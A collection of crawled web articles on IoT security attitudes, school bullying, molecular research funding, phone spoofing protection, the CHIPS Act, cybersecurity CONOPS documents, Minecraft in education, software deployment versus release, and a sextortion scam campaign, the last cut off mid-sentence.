Experts largely agree that the IoT brings with it significant risks in terms of security and privacy – but will the advantages of convenience outweigh them for consumers? Not according to an admittedly less-than-scientific, but nevertheless interesting, poll of “technologists, scholars, practitioners, strategic thinkers and other leaders”, conducted by the Pew Research Center and Elon University’s Imagining the Internet Center. In July and August last year, the researchers asked how attacks and ransomware concerns would influence the spread of connectivity – 15 percent of the 1,201 respondents said significant numbers of people would disconnect, while 85 percent said most people would “move more deeply into connected life”. Why? Strikingly, many of the survey’s respondents pointed to the convenience that comes with connectivity, and the so-called “optimism bias” that leads people to think bad things will happen to other people, but not to them. “Unless we have a disaster that triggers a major shift in usage, the convenience and benefits of connectivity will continue to attract users,” read one comment from MIT senior research scientist David Clark. “Evidence suggests that people value convenience today over possible future negative outcomes.” Tesla software engineer David Wuertele, meanwhile, told the researchers that people’s desire “for these magic devices is so strong that they will sign away their own personal data as well as their families’ (and sometimes their friends’) data to get the goodies”. Mimecast chief scientist Nathaniel Borenstein chipped in that “there are few examples in human history of people making rational decisions about privacy or security”. What’s the risk in IoT? How serious are the risks of the internet of things, though? And in particular, are we likely to see the kind of catastrophic events that would grab the attention of regular consumers? The key here, according to the security experts to whom Internet of Business has spoken, is the scale at which vulnerable devices are deployed. “Even a small security hole that may be exploitable only under very narrow conditions could become fatal in today’s IoT world if a certain device is deployed a million times,” says Steffen Wendzel, professor for information security and networks at the Worms University of Applied Sciences in Germany. “Infrastructures are becoming more and more connected due to convenience and… we’ve seen every time there is excessive connectivity, then there comes the risk represented in different forms of cyberattacks,” adds David Barzilai, chairman and co-founder of the Israeli automotive security firm Karamba Security. “The motivation today is unfortunately not just kids trying to be smart. We’re seeing organised crime or terrorist organisations or states. The temptation or the reward for that is high. What you could gain after such attacks is [increasing] because of the sheer scale of one attack.” Barzilai raises the notorious example of Chrysler’s mass vehicle recall back in 2015, which followed the revelation by two security researchers that the Jeep Cherokee could be remotely commandeered, to potentially lethal effect. “There was only one security bug that was exploited by the white-hat hackers in that Cherokee. The recall was for 1.4 million cars. All of them had the very same single security bug,” he says. “Each car today has hundreds or thousands of security bugs and we know it… The same bug repeats itself in hundreds or thousands or more of cars, so an attacker could affect the lives of so many people with one attack. This is just cars. We could talk about connected medical devices and connected infrastructure. It’s a big deal.” A matter of convenience But what about that convenience, along with the demonstrable benefits of the IoT? As Wendzel notes, “self-driving cars could ultimately make driving safer, prevent several deaths and provide drivers with the chance to do something else while driving”. However, the professor adds that consumer enthusiasm for connected devices can sometimes be overstated. “The big breakthrough of ‘smart homes’ was expected several times to become reality in the last decade,” he points out. “However, it is still ongoing and – at least in Germany – quite slowly. Besides costs, customers see no strong gain and promised energy-saving does not always work as expected.” Here’s the thing: when it comes to the IoT, the pull may not be as important as the push. Barzilai suggests that convenience is a “major enabler” for connected cars, but efficiency – for suppliers, not consumers – remains a bigger driver in the wider IoT industry. “I think the internet of things is at least now not something that is consumed by the end user, like a smart home or something like that,” he says. “But we do see a push created by vendors for [deploying in aid of] support. The escalator vendor is now selling escalators connected to the internet in order to get alerts for maintenance and do remote software upgrades.” Could we disconnect in future? There’s clearly a world of difference between consumers letting newly-connected devices into their lives, and the builders of the public environment adding connectivity to their infrastructure. Many respondents to the Pew research seem to have conflated the two phenomena under the banner of connectivity, making it difficult to tell whether they saw widespread enthusiasm for smartphones translating into acceptance for new-fangled IoT devices. But that said, some did note that IoT acceptance was likely to become involuntary. As Erik Johnston, associate professor and director of the Center for Policy Informatics at Arizona State University, put it: “Trying to disconnect in the future will be increasingly difficult. Only those who are either very privileged or unprivileged will find themselves in a situation where the majority of their lives are not connected in a meaningful way… It would be impossible to opt out of public surveillance, the TSA [Transportation Security Administration] and many other essentials of navigating a normal life.” And in the words of spreadsheet pioneer Bob Frankston, another Pew respondent: “A significant number will have the illusion of being disconnected [when they actually are not].” The optimism bias may be a real phenomenon, but that all-important risk-versus-convenience assessment may not end up being down to consumers after all.
<urn:uuid:eb817a34-710e-442b-af24-deabf43dcd0c>
CC-MAIN-2022-40
https://internetofbusiness.com/not-easy-weigh-iot-convenience-risk/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00477.warc.gz
en
0.958319
1,347
2.78125
3
Attention Governors, State Education Directors, Superintendents, School Boards, Principals and community leaders: What is Brain Drain? Most often ‘brain drain’ is defined as ‘the human capital flight’ or the loss of skilled intellectual and technical labor through the movement of such labor to more favorable geographic, economic or professional environments. But a more serious and more damaging ‘brain drain’ is taking place within our schools on a daily basis and the White House Conference on Bullying Prevention last week validates this more serious ‘brain drain’ is taking place. According to The White House Blog: Every day, thousands of kids, teens, and young adults around the country are bullied. Estimates are that nearly one-third of all school aged children are bullied each school year – upwards of 13 million students. Students involved in bullying are more likely to have challenges in school, to abuse drugs and alcohol, and to have health and mental health issues. If we fail to address bullying we put ourselves at a disadvantage for increasing academic achievement and making sure all of our students are college and career ready. ‘Brain drain’ in our schools is a serious problem that affects our nation’s future and affects our communities who must pick up the pieces. Lessons learned show there are ‘no brainer’ solutions for helping to eliminate ‘brain drain’ in schools, but school leaders and community leaders must be willing to get rid of their status quo beliefs and take advantage of innovative solutions….are you willing?
<urn:uuid:ab705cd2-d775-46b0-b9bd-9051ed97ec88>
CC-MAIN-2022-40
https://www.awareity.com/2011/03/15/no-brainer-for-brain-drain/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00477.warc.gz
en
0.957249
319
3.28125
3
Share this post: A team formed by IBM Research scientist Dr. Leo Gross, University Regensburg professor Dr. Jascha Repp, and University Santiago de Compostela professor Dr. Diego Peña Gil has received a European Research Center (ERC) Synergy Grant for their project “Single Molecular Devices by Atom Manipulation” (MolDAM). The ERC funding of this interdisciplinary project includes up to more than €9 million, over six years. Molecules are nature’s fundamental building blocks for life, having countless different roles, properties and functionalities. In MolDAM a team formed by physicists and chemists will aim to control single molecules and chemical bonds at will. Simply put, the main goal of MolDAM is to realize physicist and Nobel laureate Richard Feynman’s vision: building up matter from individual atoms the way we want, by controlling chemical reactions with the tip of a scanning probe microscope. This way, the team wants not only to resolve chemical reactions with unprecedented resolution in space and time, but also to discover completely new reactions. With these funds, novel molecules and nanostructures will be designed and built with atomic precision using atom manipulation with scanning probe microscopes. Using ultrafast light pulses, MolDAM aims at obtaining “movies” of how a bond is formed, observing in time how atoms rearrange in the course of a chemical reaction. Controlling single-electron charges within the custom-built structures will enable the investigation of electron transfer, carrier generation and recombination and redox-reactions at the molecular level. In other words, the team will catch single molecules in action. Building and studying atomically defined molecular devices on their intrinsic length and time scales will advance our fundamental understanding of the molecular world with impact on the fields of chemical synthesis, light harvesting, molecular machinery and computing. Inventing What’s Next. Stay up to date with the latest announcements, research, and events from IBM Research through our newsletter.
<urn:uuid:7f3a7755-6256-4fd8-94da-2a9aa3a6f2b8>
CC-MAIN-2022-40
https://www.ibm.com/blogs/research/2020/11/european-research-council-funds-research-into-single-molecule-devices-by-atom-manipulation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00477.warc.gz
en
0.89503
422
2.703125
3
How Does Phone Spoofing Work? Call spoofing is when the caller deliberately sends false information to change the caller ID. Most spoofing is done using a VoIP (Voice over Internet Protocol) service or IP phone that uses VoIP to transmit calls over the internet. VoIP users can usually choose their preferred number or name to be displayed on the caller ID when they set up their account. Some providers even offer spoofing services that work like a prepaid calling card. Customers pay for a PIN code to use when calling their provider, allowing them to select both the destinations number they want to call, as well as the number they want to appear on the recipient’s caller ID. Protect yourself with comprehensive mobile security. What Are The Dangers of Phone Spoofing? Scammers often use spoofing to try to trick people into handing over money, personal information, or both. They may pretend to be calling from a bank, a charity, or even a contest, offering a phony prize. These “vishing” attacks (or “voice phishing”), are quite common, and often target older people who are not as aware of this threat. For instance, one common scam appears to come from the IRS. The caller tries to scare the receiver into thinking that they owe money for back taxes, or need to send over sensitive financial information right away. Another common scam is fake tech support, where the caller claims to be from a recognizable company, like Microsoft, claiming there is a problem with your computer and they need remote access to fix it. There are also “SMiShing” attacks, or phishing via text message, in which you may receive a message that appears to come from a reputable person or company, encouraging you to click on a link. But once you do, it can download malware onto your device, sign you up for a premium service, or even steal your credentials for your online accounts. Why Is Spoofing So Prevalent? The convenience of sending digital voice signals over the internet has led to an explosion of spam and robocalls over the past few years. In fact, according to Hiya, a company that offers anti-spam phone solutions, spam calls grew to 54.6 billion in 2019, a 108% increase over the previous year. Since robocalls use a computerized autodialer to deliver pre-recorded messages, marketers and scammers can place many more calls than a live person ever could, often employing tricks such as making the call appear to come from the recipient’s own area code. This increases the chance that the recipient will answer the call, thinking it is from a local friend or business. And because many of these calls are from scammers or shady marketing groups, just registering your number on the FTC’s official “National Do Not Call Registry” does little help. That’s because only real companies that follow the law respect the registry. What Can I Do To Stop Spoofing Calls? To really cut back on these calls, the first thing you should do is check to see if your phone carrier has a service or app that helps identify and filter out spam calls. For instance, both AT&T and Verizon have apps that provide spam screening or fraud warnings, although they may cost you extra each month. T-Mobile warns customers if a call is likely a scam when it appears on your phone screen, and you can sign up for a scam blocking service for free. There are also third-party apps such as RoboKiller and Nomorobo that you can download to help you screen calls, but you should be aware that you will be sharing private data with them. Other Tips For Dealing With Unwanted Calls - After registering for the Do Not Call Registry and checking out your carrier’s options, be very cautious when it comes to sharing your contact information. If an online form asks for your phone number but does not need it, leave that field blank. Also, avoid listing your personal phone number on your social media profiles. - If you receive a call from an unrecognized number, do not answer it. You can always return the call later to see if it was a real person or company. If it was a scam call, you can choose to block the number in your phone, but that too can be frustrating since scammers change their numbers so often. - You can report unwanted calls to the FTC. - Be wary of entering contests and sweepstakes online, since they often share data with other companies. - Stay up-to-date on the latest scams, so you know what to look out for, and install mobile security on your phone to help protect you from malware and other threats. Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats.
<urn:uuid:bd9fcf03-62f8-4a0c-9ad2-ee3257d8b34c>
CC-MAIN-2022-40
https://www.mcafee.com/blogs/privacy-identity-protection/how-to-stop-phone-spoofing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00477.warc.gz
en
0.937665
1,037
3.078125
3
Two former senior defense and intelligence leaders lay out the case for Congressional action to help the U.S. semiconductor industry. After 9/11, the country moved swiftly to secure cockpits and improve airport security. Today, we must act with similar urgency to build up America’s ability to design and produce new microchips—starting by passing the CHIPS Act. Despite America’s impressive semiconductor design and innovation advantages, the U.S. is falling behind in advanced semiconductor production. The U.S. makes just 12 percent of the world's chips while 80 percent come from the Indo-Pacific region. Moreover, global demand is outstripping supply, with chip sales rising up to 17 percent from 2019 to 2021. The world’s semiconductor-makers have responded by making chips at maximum capacity, but the realities of chip production have made those efforts insufficient. In 2021 alone, the chip supply shortage cost the U.S. economy $240 billion. The high-tech weapons and systems that help give the United States its superiority across every domain of warfare depend on chips. The Javelin anti-tank missile alone, for example, contains more than 200 microelectronic components. This all creates irresponsible risks for U.S. national security and for American warfighters. We should know: one of us just stepped down as the Deputy Assistant Secretary of Defense for Industrial Policy; the other led the U.S. intelligence community’s assessments on foreign investments in U.S. technology. The answer is to build more production capacity in the United States, but that’s no quick fix. New semiconductor fabrication plants are technically complex and require extensive capital to fund. McKinsey and Company estimates that building a state-of-the-art fab requires more than three years and $10 billion. Even less-advanced factories come with a hefty price tag: about $5 billion for a 5nm chip fab and $.17 billion for a 10nm one. The CHIPS Act would reduce US reliance on foreign-made semiconductors. The Atlantic Council estimates that with the CHIPS Act, by 2030, US semiconductor manufacturing would account for about 14 percent of global production; without it, the U.S. would drop to ten percent. But that four percent difference is far greater than the numbers would imply because what the U.S. would be producing is the most advanced chips. To do this, the CHIPS Act provides roughly $52 billion to encourage domestic semiconductor manufacturing. This investment would provide the necessary down-payment for avoiding technology dependence on foreign chipmakers, curtail inflation of semiconductor prices, and enable a competitive market in the U.S. that takes advantage of our know-how in designing and producing the most advanced chips, especially those at 14 nanometers and below. Critics argue that the CHIPS Act would distort the market. It might. Lawmakers should strongly consider how to incentivize local development across the segments of the market and avoid picking corporate winners. America’s economic competitiveness has always come from its capacity to harness the power of the market. But the global semiconductor market is already distorted by a network of foreign competitors who undermine the U.S. ability to compete on production cost–by subsidizing nearly 30 percent of semiconductor revenues. Beijing has already provided more than $160 billion in subsidies to China chip manufacturers. Taiwan's chipmakers are investing $120 billion; the Republic of Korea is giving up to $450 billion in tax credits over the next 10 years; and Japan’s subsidies are designed to enable it to triple its chip production by 2030. The European Union has also committed $48 billion to chip production in order to reduce dependency on foreign firms. The CHIPS Act, which at press time was advancing through the Senate and awaiting action by the House, will renew a critical area of American strength, while also creating new opportunities with our allies. Japan, South Korea, Germany, and Taiwan all produce some of the world’s most advanced chips. Dutch lithography technology is currently key to every nation’s production of the smallest-die chips. The push to build global semiconductor resilience is accelerating U.S. efforts to deepen its defense industrial cooperation with our allies and partners. Together with our allies, we can strengthen supply chain resilience, advance our sources of economic strength, and ensure our warfighters have reliable advantages on the battlefield. Jonathan Panikoff is a Senior Fellow at the Atlantic Council’s Geoeconomics Center and the former Director of the Investment Security Group at the Office of the Director of National Intelligence. Jesse Salazar is recently served in the Biden Administration as the Deputy Assistant Secretary of Defense for Industrial Policy.
<urn:uuid:3cf27d1a-f604-4372-bc8d-a5868ebb8df2>
CC-MAIN-2022-40
https://www.nextgov.com/ideas/2022/07/pass-chips-act/374989/?oref=ng-next-story
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00477.warc.gz
en
0.942716
970
2.53125
3
Concept of Operations (CONOPS) - The Missing Link of Program-Level Cybersecurity & Data Protection Guidance A Concept of Operations (CONOPS) document provides user-oriented guidance that describes crucial context from an integrated systems point of view (e.g., mission, operational objectives and overall expectations), without being overly technical or formal. A CONOPS is meant to: - Benefit stakeholders by establishing a baseline “operational concept” to establish a conceptual, clearly-understood view for everyone involved in the scope of operations described by the CONOPS. - Record design constraints, the rationale for those constraints and to indicate the range of acceptable solution strategies to accomplish the mission and any stated objectives. - Contain a conceptual view that illustrates the top-level functionality in the proposed process or system. A CONOPS is not a set of policies, standards or procedures, but it does compliment and support those documents. A CONOPS straddles the territory between an organization's centrally-managed policies/standards and its decentralized, stakeholder-executed procedures, where a CONOPS serves as expert-level guidance that is meant to run a specific capability or function within an organization's cybersecurity department. An organization's Subject Matter Experts (SMEs) are expected to use a CONOPS as a tool to help communicate user needs and system characteristics to developers, integrators, sponsors, funding decision makers and other stakeholders. Several ComplianceForge documents are essentially CONOPS documents, where those CONOPS-like documents are (1) more conceptual than procedures and (2) are focused on providing program-level guidance to define and mature a specific capability that is called for by policies and standards (e.g., operate a "risk management program"). Examples of ComplianceForge products that provide program-level guidance to define a function-specific concept of operations include: - Risk management (e.g., Risk Management Program (RMP)) - Vulnerability management (e.g., Vulnerability & Patch Management Program (VPMP)) - Incident response (e.g., Integrated Incident Response Program (IIRP)) - Business Continuity / Disaster Recovery (e.g., Continuity of Operations Plan (COOP)) - Secure engineering practices (e.g., Security & Privacy By Design (SPBD)) - Pre-production testing (e.g., Information Assurance Program (IAP)) - Supply Chain Risk Management (SCRM) (e.g., Third-Party Security Management (TPSM)) - Configuration management (e.g., Secure Baseline Configurations (SBC))
<urn:uuid:7a9ffee7-7f6f-4978-a25f-f7f495b41673>
CC-MAIN-2022-40
https://www.complianceforge.com/reasons-to-buy/cybersecurity-conops/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00677.warc.gz
en
0.893721
533
2.59375
3
The fundamental question we should be asking children as they grow up is no longer what they want to “be” but rather what they would like to “do.” What problems are they passionate about solving, and what are the skills that will enable them to achieve their goals. Traditional education models are at odds with this type of thinking, however, as they are still built largely around the mythology of finite goals. The concept that there are clear milestones and an eventual finishing line to learning was never ideal, but it is even more woefully inadequate in a technology-enabled world. To thrive in volatile environments, we must embrace life-long learning. One solution that educators are deploying to bridge that gap between traditional learning delivery systems and newer workflows and expectations, is the use of gamified learning platforms. Gamified learning is very helpful in cultivating a mindset where problem-solving becomes a fun activity, and failure is seen as a stepping stone. If, like myself, you’re old enough to have earned your gaming chops alongside Mario or Sonic, you’re unlikely to recall exactly how many times you “died” along the way, or exactly how you adapted your strategy incrementally after each setback. The moments when you beat that boss and rescue the princess, however, tend to stick with you. Vice President of Education at Microsoft Anthony Salcito spoke with me during this week’s Education Exchange conference (E2 in Paris, which brought together a diverse group of educators from all over the world to discuss how best to leverage technology such as Minecraft to deliver better learning outcomes for students. For those unfamiliar with Minecraft, it is a game that allows players to construct 3D worlds out of textured cubes, but players must explore and gather resources in order to do so. There are individual and collaborative multi-player modes. It was originally published in 2011 before being acquired by Microsoft in 2014. To date it has sold over 121 million copies making it second only to Tetris in terms of popularity. Microsoft has since developed Minecraft: Education Edition which is used in schools and has additional pedagogical tools and functionalities. Learning by teaching “When you find something joyful, you will discover that fully. I learn more from students than the people actually coding the game in Redmond, says Meenoo Rami ,Educator Advocate at Minecraft and Microsoft. Since many students are already familiar with the platform from playing the game at home, educators are able to draw upon the student’s own expertise and to focus on the learning aspects rather than covering the mechanics of the technology itself. It also prompts situations where “expert” users mentor younger learners and also help teachers who might not be as familiar with the platform as their students, further fostering a collaborative ethos in the classroom. Building modular skillsets Another advantage of Minecraft is that it helps to encourage a modular approach to building skillsets. When each new problem demands you to find and leverage different resources, materials and collaborations, you start to envisage those as pieces of a puzzle, for which there are multiple possible solutions. This is why LEGO and Minecraft have proven so popular and effective in those contexts, as their core design is in itself modular. A recently published survey polled teachers across 11 countries and four continents. It revealed that students’ decision-making and communication ability were positively impacted by the time they spent playing Minecraft, and that it cultivated a creative problem-solving mindset. In Minecraft, starting over represents a new opportunity rather than a regrettable ordeal. Remaining calm and focusing on solving a problem is a skill that is likely to serve students well throughout their academic and professional careers. Surveyed teachers reported that students using the platform were confident interacting freely during lessons, exercising agency often without prompts from teachers and overcoming challenges as teams. They found that working through the game made it easier to bridge accessibility issues, in that students with different learning styles and abilities were more easily able to find common ground, and to share what they discover in multiple formats. They also felt comfortable experimenting, and perceived failure as part of the creative learning process. This resilience and growth mindset is very much recognized as a key desirable trait by employers, especially in innovative industries such as technology. Paradoxically, however, the more teachers and students utilized the Minecraft platform to deliver pedagogical content and improve learning outcomes, the less emphasis they placed on the game itself. As is often the case with successful technology solutions, the measure of their success hinges on how invisible they become, allowing the content to shine through. Social emotional learning Considering how videogaming is often perceived as being socially isolating, it is somewhat surprising that one of the areas that was most dramatically improved by engagement with the Minecraft for Education platform was social and emotional learning (SEL). A study conducted by Microsoft has shown that an increasing number of schools across the SEL, an approach that builds skills and competencies that help students be successful in school, work, and life. In the context of K–12 education, SEL is the process through which students acquire and effectively apply the knowledge, attitudes and skills necessary to understand and manage emotions, set and achieve positive goals, feel and show empathy for others, establish and maintain positive relationships, and make responsible decisions. SEL initiatives thrive when woven into subjects across the curriculum throughout the traditional school day, tackling real-world problems, or at the very least problems that “feel” real to students. Research has shown that students exposed to SEL are better equipped to manage themselves and exhibit agency over their own academic experience, have a greater understanding of the perspectives of others and a better ability to relate effectively to them, and are able to make sound choices about personal and social decisions. Social emotional learning comes to life when knowledge is applied to solving relevant problems, whether in the context of real-world scenarios or disguised as play. One of the best examples that Rami showed me was how students needed to leverage basic chemistry to obtain materials such as latex. This could in turn can be used to make balloons. And those balloons can be attached to the whimsical pigs that populate the game (once you manage to catch them, that is). I have a feeling that applying chemistry to make pigs fly is the sort of thing that might make a student remember what that chemical components of latex are far better than memorizing the periodic table ever could. I know the image of those floating square pigs stuck in my mind. Comprehensive SEL goals include developmental benchmarks across five key social and emotional competency domains, encompassing self-awareness, self-management, social awareness, relationship skills and responsible decision-making skills. More than just a videogame Minecraft creates opportunities for transformational learning experiences, says Dr. Michelle Zimmerman, an educational researcher who works at Renton Prep Christian School, an institution which makes extensive use of the platform in delivering its curriculum. Educators have the opportunity to help students develop empathy through gaming and imagine how they’d like to be treated, talk through scenarios in gaming and in their personal lives, and discuss how they would do something differently (or have wanted to be treated differently), then practice those skills. Technology doesn’t impede our ability to build relationships; conversely, with regard to gaming in the classroom, it can serve to further bolster them. We know that human connection can be powerful in many settings and environments. Gaming is no exception, Zimmerman concludes. It’s somewhat ironic, Salcito says, that as the world becomes ever more digital, companies like Microsoft are more than ever in need of hiring people with interpersonal skills. As artificial intelligence transforms the labour market, the importance of human skills like creativity, interpersonal understanding, and empathy becomes exponentially more valuable. Therefore, those who can make connections and foster collaboration in globally distributed teams, who are capable of relating to, empathise with, and inspire their peers. And that valuing of so-called “soft skills” in the workplace is far from a trend that’s unique to Microsoft. Because more companies are demanding this, universities are also pivoting towards offering “mission based” degrees. In other words, you enrol in order to explore how to solve a problem rather than to “become” something. Stephane Cloatre, Minecraft Global Mentor who works in partnership with Microsoft, says that this flexibility also allows the platform to evolve and incorporate emerging technologies as they become more prevalent for students. Mixed Reality, which is a big focus for Microsoft’s own strategy, is a prime example of this. Rami adds that students and teachers ask all the time about when immersive functionality will be rolled out on the platform, but for Cloatre, the pieces are in place for that to happen, since Minecraft is pretty much a 3D design platform already. It is easy to see how that could actually become quite an exciting avenue in future, as immersive tech becomes pervasive it will require lot of fresh talent and skilled professionals to develop the ecosystem to its full potential. Yet none of this, Salcito stresses, can happen without proactive educators leveraging the platform to appropriately support learning outcomes for students. “Educators are champions, without them we can’t do this,” he concludes.
<urn:uuid:a30d5f8b-2120-48aa-8173-cb4f322753c9>
CC-MAIN-2022-40
https://www.cio.com/article/219928/is-minecraft-the-future-of-education.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00677.warc.gz
en
0.969457
1,913
2.796875
3
Most of us have heard about it, but are we all able to explain what it is? Robotic Process Automation (RPA) is based on artificial intelligence. A wide variety of definitions have been used to try to predict its effect on years to come in business and privacy. People do not tire of discussing possible future changes, with both skepticism and emotion. So, what exactly lies behind the terminology, and in which way can RPA improve our future workflows and processing? What is RPA? Strictly speaking, Robotic Process Automation is simply software. But it’s not just any kind of software. RPA is software that combines various components to execute front and back-office routine processes automatically. It doesn’t require interfaces or application changes, and whatever basic daily actions used to be performed by employees can now be conducted without human action. RPA is able to search for specific data from emails, copy it, identify important customer requests, and transmit information between computer screens. How does RPA work Through cognitive software, Robotic Process Automation simulates human handling of computers. By using a virtual agent, it takes advantage of certain applications and process performances. Does RPA provide any additional value? Together with artificial intelligence and adaptive software, RPA is a key technology shifting away from analogue business IT (application silo) towards a cross-linked digital infrastructure. With regard to data capturing and processing, RPA is able to record structured data (such as slips), semi-structured data (such as invoices) and unstructured data (such as emails or letters) from all possible input sources and take it to further procedures. Information can be processed faster, more precisely and more efficiently thanks to Robotic Process Automation. Employees are being relieved from executing routine tasks and freed up to focus on more challenging activities. What do the experts have to say? According to Gartner's 2013 speech about ‘Cool Vendors in Business Process Service’, Robotic Process Automation contributes “more precise and efficient rule-based implementations and information procedures in companies”. Just one year later, Forrester added that it is a “key technology for automated user activities while operating diverse applications”. According to an HfS Research expert's estimation, CIOs have the great opportunity to commence automated operation processes without any delay and without interfering with IT resources that consist of lengthy integration projects. Lastly, here’s an expert’s statement about disruptive technologies and technical changes: “You may try to escape, but you will not be able to close your mind to them”, says Marina Gorbis from the Institute for the Future. Robotic Process Automation is definitely amongst those modifying visionary technologies.
<urn:uuid:db009764-c8d8-4d99-9c1a-7ee5efc4c9bd>
CC-MAIN-2022-40
https://www.ityxsolutions.com/blog/rpa-defined
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00677.warc.gz
en
0.918209
571
2.890625
3
For all the work involved in the world of software development, it is only when a customer uses the software to achieve an outcome that the software’s value is realized. Every day, thousands of updates are made available on app stores, mostly pushing bug fixes, security updates, and performance improvements; sometimes making the latest features available for users to enjoy. App store intelligence firm App Annie reported that in the second quarter of 2020, app downloads reached a high of nearly 35 billion. In service management, two terms, deployment and release, are often used interchangeably to describe rollout of these updates. But is there a difference between them? Let’s investigate. (For the quick answer, skip ahead to the key difference between deploying and releasing software.) What is deployment? Deployment involves moving software from one controlled environment to another. According to the ITIL 4 practice guides, An environment is a subset of IT infrastructure used for a particular purpose. The most common environments are: - Development. Commonly referred to as dev, this is where developers build the code. - Integration. Here, the new code is combined and validated that it works with existing code. - Test. This is where both functional and non-functional tests are conducted on the merged code to confirm it meets organization and customer requirements. - Staging. This environment is used to test the software using real data to validate it is ready for use. - Production. Commonly referred to as prod, this is where the software is made available to users. Deployment is generally considered the final stage of the software development lifecycle (SDLC): The activities involved in deployment management include: - Planning deployment. Preparation tasks including authorization, alignment of resources, and scheduling. - Verifying service components. Unit and integration testing, with iterative fixing and retesting. - Verifying target environments. Validation to ensure that the host environments are ready for accepting the software packages. - Executing deployment. Pushing the software into the environment and conducting relevant system tests. - Confirming deployment. Acceptance testing to validate customer requirements are met. Post review and lessons learnt activities are also carried out here. Traditionally, deployments were carried out using what is termed a big-bang approach where all features are released in one go. But currently, due to technology and risk management, rolling or phased deployments are preferred through gradual release across the environment over a period of time. One common technique used in deployment is the blue-green approach. Here, two identical but separate production environments are used, with the current code running on the ‘blue’ environment, and the new code being deployed on the ‘green’ environment. Traffic is then switched from blue to green, and the performance of the new service or features is then monitored. In case of a major hitch, traffic is switched back to blue (like a rollback), allowing for fixing and remedies without affecting customers significantly. Improving deployment activities Deployment had been a challenging part of software development through the years, but lately has been made easier thanks to advances in practices such as DevOps. CI/CD (Continuous Integration/Continuous Delivery or Deployment) has resulted in faster deployment of software with fewer errors thanks in part to automation in integration, testing and deployment. Tools are fast becoming mainstream solutions in this area, such as: However, many organizations still use manual change approvals to trigger deployment to production environments, typically for two main reasons: - To mitigate the risk involved in case live services are affected. - To meet compliance needs. What is software release? According to the ISO/IEC 20000 standard definition, a release is: A collection of one or more new or changed services or service components deployed into the live environment as a result of one or more changes. In other words, a release makes services and features available to users. More often than not, release management is more of a business responsibility than a technical responsibility. This is because the decisions on scheduling releases can be tied to business strategy from a revenue or portfolio management perspective. A company can decide to release features based on an agreed marketing plan or stagger the releases to prevent cannibalizing existing products or to counter competitor activity. Features can also be released to different customers based on the company’s product offerings, e.g. premium customers getting advanced functionalities. The most general categorization of releases is based on scope: - The terms major and minor are used to describe a release in relation to the significance of change in code, service, and features. For example, a major release could see a software moving from version 2.4 to 3.1, while a minor release could be from 2.2.1 to 2.2.2. - Emergency release is used to define a software version or package that is availed quickly to address a major issue especially from a security or performance perspective. - Maintenance release for bug fixes and patches. - Feature release for new or changed functionality. Some release techniques used in software development include: - Canary Release. This involves releasing new features to only a subset of users. Just like the canary birds are used to test poisonous gases in mines, this user group is the test case to unearth any issues, before the rest of the population is given access. - Dark Launching. Similar to canary releases, dark launching involves activating features for a subset of users who are not aware of the new functionalities (hence “dark”). This can be done through the use of feature flags, that allow toggling on and off of features based on the needs of the organization. Deployment vs Release: The key difference The key distinction between these deployment and release is the business rationale. Deployment doesn’t necessarily mean users have access to features, as can clearly be seen by the different environments involved. Some companies will release at the same time as deployment to production is taking place. Others will choose to wait, thereby having the new features in production but not availed to users until the business decides. For more on this topic, explore these resources:
<urn:uuid:9a982880-888d-423f-bca5-1f835c2c5d92>
CC-MAIN-2022-40
https://blogs.bmc.com/software-deployment-vs-release/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00677.warc.gz
en
0.944827
1,290
2.859375
3
One of the scariest things about online scams is their impact on enormous segments of the population. The victims often deal with reputational damage and expenses associated with recovering from the attack and improving their current computer security practices to reduce the chances of something happening again. Anyone needing a reminder of the extent of some internet scams needs only consider recent news published by Cofense Labs. This research and development arm is associated with Cofense, a company that provides intelligent phishing solutions. What Did Researchers Find? Representatives from Cofense Labs compiled a database of more than 200 million people with compromised online accounts. Further research indicated that those people were targets for a sextortion scam. The scam’s reach got so substantial due partly to a botnet that was available on a for-rent basis, according to the Cofense team. The researchers started monitoring the botnet after discovering it in June 2019. They confirmed it was not infecting computers with malware to find new data. Instead, the botnet searched for people’s reused credentials that got compromised through past data breaches. If a person’s email was on the botnet’s target list, they will likely receive a sextortion email — or may already have. What Is Sextortion? Sextortion occurs when a scammer tries to get a victim to pay a ransom to prevent the scammer from leaking sensitive information. For example, a cybercriminal who focuses on sextortion may claim they have webcam footage of a business leader engaging in sex with their partner. If the victim has a computer with a camera in the room where they typically have intercourse, they’d have no way of confirming whether the criminal has captured footage. Sextortion can also occur if the perpetrator tries to get someone to perform sexual acts to stop information from becoming public. For example, some criminals attempt to force people to send them naked photos instead of ransom money. Many experts say sextortion schemes are on the rise, and Cofense’s research confirmed that trend. It has reportedly already found millions of emails impacted by sextortion scams in the first half of 2019 alone. Some hackers who start with sextortion also branch out into other types of attacks. For example, the same cybercriminals who sent out mass emails about a false bomb threat were linked to sextortion. Those criminals demanded up to $20,000 in Bitcoin payments from their victims. How Can People Stay Protected? The criminals behind this massive sextortion campaign recycled old email-password combinations from at least a decade ago, according to Cofense Labs’ cybersecurity professionals. They also said it’s easier for hackers to convey urgency and authenticity with their emails because people often have poor password hygiene and reuse their credentials across multiple sites. Cofense’s dedicated page associated with the sextortion scam features a search function that people can use to find out if they’re on the target list. These individuals should immediately change their passwords associated with those accounts. The Cofense Labs researchers also do not advise people to pay the ransoms. Staying safeguarded against this attack and others also requires getting smarter about choosing and using passwords. Using a password manager, for example, is a convenient technique for people who are worried about forgetting their passwords or not making them complex enough. Some password managers generate passwords for the sites people use and 